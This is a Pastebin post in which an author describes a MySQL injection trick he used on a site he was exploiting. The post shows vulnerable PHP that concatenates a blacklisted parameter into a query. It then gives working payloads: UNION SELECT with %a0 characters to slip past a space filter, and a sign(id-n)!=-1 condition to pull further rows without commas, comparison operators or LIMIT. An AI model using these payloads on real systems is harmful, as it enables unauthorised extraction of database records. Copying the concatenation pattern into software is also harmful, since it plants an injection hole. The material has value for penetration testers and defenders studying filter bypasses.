Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* ***************************************************************************************
- * mySQL Injection - getting records from a Db without using "<", ">" or "limit" *
- * @Author : Twitter.com/PaulDS_FR *
- **************************************************************************************** */
- So yesterday i was working on a complicated to exploit SQL Injection... Basically the code was (i guess) something like this :
- $blacklist = array('"',"'",' ', ','); //simplified, had a lot more in there !
- $id = htmlentities(str_replace($blacklist, '', $_GET['id']));
- $res = $dbh->query('select * from table where id= ' . $id)->fetch();
- echo $res->id . $res->text;
- So the first record is easy to get (classic SQL injection i'll not cover) but how do go on and get the next(s) row(s) knowing you cannot play with limit (requires a coma) nor with the "less than" (<) or "more than" (>) operators as they are converted into html entities (who does that by the way !) ?
- Well i figured this trick out :
- ?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-1)!=-1
- ?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-2)!=-1
- ...
- Without the %a0 to insert nbsp (evade the blacklisting of spaces) :
- ?id=-1 union select column1,column2 from table where sign(id-prev_id)!=-1
- Important part is : where sign(id-prev_id)!=-1
- It also worked (as was my case) to get other records from the same table without knowing their ids. I had 3 rows printed (ids 1,2,3) out of a count of 4 rows in the table... Where are you little id ?
- ?id=sign(id-4)!=-1
- ?id=sign(id)=-1
- The id I was searching for was 1337 (of course :))
- Ref :
- http://dev.mysql.com/doc/refman/5.0/en/mathematical-functions.html#function_sign
- Paul da Silva - 07/11/2012 - Pardon my english, I'm french ;)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement